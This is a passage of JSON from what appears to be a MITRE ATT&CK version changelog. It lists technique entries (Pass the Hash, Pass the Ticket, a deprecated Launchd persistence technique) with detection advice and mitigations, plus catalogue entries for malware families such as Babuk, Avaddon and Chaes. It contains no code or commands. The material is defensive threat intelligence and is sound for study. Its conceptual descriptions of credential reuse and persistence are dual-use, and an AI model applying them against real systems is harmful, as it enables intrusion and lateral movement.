"description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.",
"url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Shailesh Tiwary (Indian Army)",
"Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)",
"Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
"Mark Wee"
],
"x_mitre_data_sources": [
"Web Credential: Web Credential Usage",
"Application Log: Application Log Content"
],
"x_mitre_defense_bypassed": [
"System Access Controls"
],
"x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Office 365",
"SaaS",
"Google Workspace"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-02 17:18:55.891000+00:00\", \"old_value\": \"2021-04-14 18:09:45.539000+00:00\"}}}",
"previous_version": "1.2",
"changelog_mitigations": {
"shared": [
"M1021: Restrict Web-Based Content",
"M1041: Encrypt Sensitive Information",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0006: Web Credential (Web Credential Usage)",
"DS0015: Application Log (Application Log Content)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-30 16:36:51.184000+00:00",
"modified": "2021-08-31 19:55:02.702000+00:00",
"name": "Pass the Hash",
"description": "Adversaries may \u201cpass the hash\u201d using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1550/002",
"external_id": "T1550.002"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/644.html",
"external_id": "CAPEC-644"
},
{
"source_name": "Stealthbits Overpass-the-Hash",
"description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.",
"url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Blake Strom, Microsoft 365 Defender",
"Travis Smith, Tripwire"
],
"x_mitre_data_sources": [
"User Account: User Account Authentication",
"Logon Session: Logon Session Creation",
"Active Directory: Active Directory Credential Request"
],
"x_mitre_defense_bypassed": [
"System Access Controls"
],
"x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-31 19:55:02.702000+00:00\", \"old_value\": \"2021-03-15 21:04:33.228000+00:00\"}}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [
"M1018: User Account Management",
"M1026: Privileged Account Management",
"M1051: Update Software",
"M1052: User Account Control"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0002: User Account (User Account Authentication)",
"DS0026: Active Directory (Active Directory Credential Request)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-30 17:03:43.072000+00:00",
"modified": "2021-08-31 19:56:31.341000+00:00",
"name": "Pass the Ticket",
"description": "Adversaries may \u201cpass the ticket\u201d using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1550/003",
"external_id": "T1550.003"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/645.html",
"external_id": "CAPEC-645"
},
{
"source_name": "ADSecurity AD Kerberos Attacks",
"description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.",
"url": "https://adsecurity.org/?p=556"
},
{
"source_name": "GentilKiwi Pass the Ticket",
"description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.",
"url": "http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos"
},
{
"source_name": "Campbell 2014",
"description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.",
"url": "http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf"
},
{
"source_name": "Stealthbits Overpass-the-Hash",
"description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.",
"url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
},
{
"source_name": "CERT-EU Golden Ticket Protection",
"description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.",
"url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Vincent Le Toux",
"Ryan Becwar"
],
"x_mitre_data_sources": [
"User Account: User Account Authentication",
"Logon Session: Logon Session Creation",
"Active Directory: Active Directory Credential Request"
],
"x_mitre_defense_bypassed": [
"System Access Controls"
],
"x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Windows"
],
"x_mitre_system_requirements": [
"Kerberos authentication enabled"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-31 19:56:31.341000+00:00\", \"old_value\": \"2021-03-15 21:42:11.839000+00:00\"}}}",
"previous_version": "1.1",
"changelog_mitigations": {
"shared": [
"M1015: Active Directory Configuration",
"M1018: User Account Management",
"M1026: Privileged Account Management",
"M1027: Password Policies"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0002: User Account (User Account Authentication)",
"DS0026: Active Directory (Active Directory Credential Request)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
}
],
"revocations": [],
"deprecations": [
{
"type": "attack-pattern",
"id": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2019-12-03 14:15:27.452000+00:00",
"modified": "2021-10-07 21:38:03.610000+00:00",
"name": "Launchd",
"description": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. \n\nAdversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n\nAn adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1053/004",
"external_id": "T1053.004"
},
{
"source_name": "AppleDocs Launch Agent Daemons",
"description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.",
"url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"
},
{
"source_name": "Methods of Mac Malware Persistence",
"description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.",
"url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Scheduled Job: Scheduled Job Creation",
"Command: Command Execution",
"File: File Modification",
"Process: Process Creation"
],
"x_mitre_deprecated": true,
"x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"root"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_remote_support": false,
"x_mitre_version": "1.0",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": true}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-07 21:38:03.610000+00:00\", \"old_value\": \"2020-03-23 22:41:14.739000+00:00\"}, \"root['description']\": {\"new_value\": \"This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. \\n\\nAdversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\\n\\nAn adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.\", \"old_value\": \"Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\\n\\nAn adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n+This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. \\n+\\n Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\\n \\n An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.\"}}}"
}
],
"deletions": []
},
"software": {
"additions": [
{
"type": "malware",
"id": "malware--295721d2-ee20-4fa3-ade3-37f4146b4570",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-10 14:53:49.448000+00:00",
"modified": "2021-10-14 23:17:58.410000+00:00",
"name": "AppleSeed",
"description": "[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0622",
"external_id": "S0622"
},
{
"source_name": "Malwarebytes Kimsuky June 2021",
"description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.",
"url": "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"AppleSeed"
],
"x_mitre_platforms": [
"Windows",
"Android"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--58c5a3a1-928f-4094-9e98-a5a4e56dd5f3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-23 19:38:33.073000+00:00",
"modified": "2021-10-18 21:41:22.437000+00:00",
"name": "Avaddon",
"description": "[Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0640",
"external_id": "S0640"
},
{
"source_name": "Awake Security Avaddon",
"description": "Gahlot, A. (n.d.). Threat Hunting for Avaddon Ransomware. Retrieved August 19, 2021.",
"url": "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/"
},
{
"source_name": "Arxiv Avaddon Feb 2021",
"description": "Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.",
"url": "https://arxiv.org/pdf/2102.04796.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Avaddon"
],
"x_mitre_contributors": [
"Matt Brenton, Zurich Global Information Security"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--57d83eac-a2ea-42b0-a7b2-c80c55157790",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-26 18:49:41.155000+00:00",
"modified": "2021-10-15 11:41:06.816000+00:00",
"name": "BADFLICK",
"description": "[BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0642",
"external_id": "S0642"
},
{
"source_name": "FireEye Periscope March 2018",
"description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.",
"url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
},
{
"source_name": "Accenture MUDCARP March 2019",
"description": "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.",
"url": "https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"BADFLICK"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--8bd47506-29ae-44ea-a5c1-c57e8a1ab6b0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-10-01 20:26:49.502000+00:00",
"modified": "2021-10-15 21:00:52.016000+00:00",
"name": "BLUELIGHT",
"description": "[BLUELIGHT](https://attack.mitre.org/software/S0657) is a remote access Trojan used by [APT37](https://attack.mitre.org/groups/G0067) that was first observed in early 2021.(Citation: Volexity InkySquid BLUELIGHT August 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0657",
"external_id": "S0657"
},
{
"source_name": "BLUELIGHT",
"description": "(Citation: Volexity InkySquid BLUELIGHT August 2021)"
},
{
"source_name": "Volexity InkySquid BLUELIGHT August 2021",
"description": "Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.",
"url": "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"BLUELIGHT"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--61c7a91a-0b83-461d-ad32-75d96eed4a09",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-11 17:36:46.197000+00:00",
"modified": "2021-10-13 14:29:38.795000+00:00",
"name": "Babuk",
"description": "[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a \"Big Game Hunting\" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0638",
"external_id": "S0638"
},
{
"source_name": "Babyk",
"description": "(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)"
},
{
"source_name": "Vasa Locker",
"description": "(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)"
},
{
"source_name": "Sogeti CERT ESEC Babuk March 2021",
"description": "Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.",
"url": "https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf"
},
{
"source_name": "McAfee Babuk February 2021",
"description": "Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.",
"url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf"
},
{
"source_name": "CyberScoop Babuk February 2021",
"description": "Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.",
"url": "https://www.cyberscoop.com/babuk-ransomware-serco-attack/"
},
{
"source_name": "Trend Micro Ransomware February 2021",
"description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.",
"url": "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Babuk",
"Babyk",
"Vasa Locker"
],
"x_mitre_contributors": [
"Hiroki Nagahama, NEC Corporation",
"Pooja Natarajan, NEC Corporation India",
"Manikantan Srinivasan, NEC Corporation India",
"Daniyal Naeem, BT Security"
],
"x_mitre_platforms": [
"Windows",
"Linux"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-02-09 14:35:39.455000+00:00",
"modified": "2021-10-17 18:43:07.613000+00:00",
"name": "Bad Rabbit",
"description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) ",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0606",
"external_id": "S0606"
},
{
"source_name": "Secure List Bad Rabbit",
"description": "Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.",
"url": "https://securelist.com/bad-rabbit-ransomware/82851/"
},
{
"source_name": "ESET Bad Rabbit",
"description": "M.L\u00e9veille, M-E.. (2017, October 24). Bad Rabbit: Not\u2011Petya is back with improved ransomware. Retrieved January 28, 2021.",
"url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/"
},
{
"source_name": "Dragos IT ICS Ransomware",
"description": "Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.",
"url": "https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Bad Rabbit",
"Win32/Diskcoder.D"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--c26f1c05-b861-4970-94dc-2f7f921a3074",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-03 14:55:46.682000+00:00",
"modified": "2021-10-16 01:33:59.932000+00:00",
"name": "BoomBox",
"description": "[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0635",
"external_id": "S0635"
},
{
"source_name": "MSTIC Nobelium Toolset May 2021",
"description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.",
"url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"BoomBox"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--919a056e-5104-43b9-ad55-2ac929108b71",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-27 20:50:56.335000+00:00",
"modified": "2021-10-16 02:17:53.847000+00:00",
"name": "BoxCaon",
"description": "[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0651",
"external_id": "S0651"
},
{
"source_name": "BoxCaon",
"description": "(Citation: Checkpoint IndigoZebra July 2021)(Citation: HackerNews IndigoZebra July 2021)"
},
{
"source_name": "Checkpoint IndigoZebra July 2021",
"description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.",
"url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
},
{
"source_name": "HackerNews IndigoZebra July 2021",
"description": "Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. Retrieved September 24, 2021.",
"url": "https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"BoxCaon"
],
"x_mitre_contributors": [
"Pooja Natarajan, NEC Corporation India",
"Yoshihiro Kori, NEC Corporation",
"Manikantan Srinivasan, NEC Corporation India"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--77e0ecf7-ca91-4c06-8012-8e728986a87a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-30 16:13:40.232000+00:00",
"modified": "2021-10-12 21:51:39.986000+00:00",
"name": "Chaes",
"description": "[Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0631",
"external_id": "S0631"
},
{
"source_name": "Chaes",
"description": "(Citation: Cybereason Chaes Nov 2020)"
},
{
"source_name": "Cybereason Chaes Nov 2020",
"description": "Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.",
"url": "https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Chaes"
],
"x_mitre_contributors": [
"Daniyal Naeem, BT Security"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
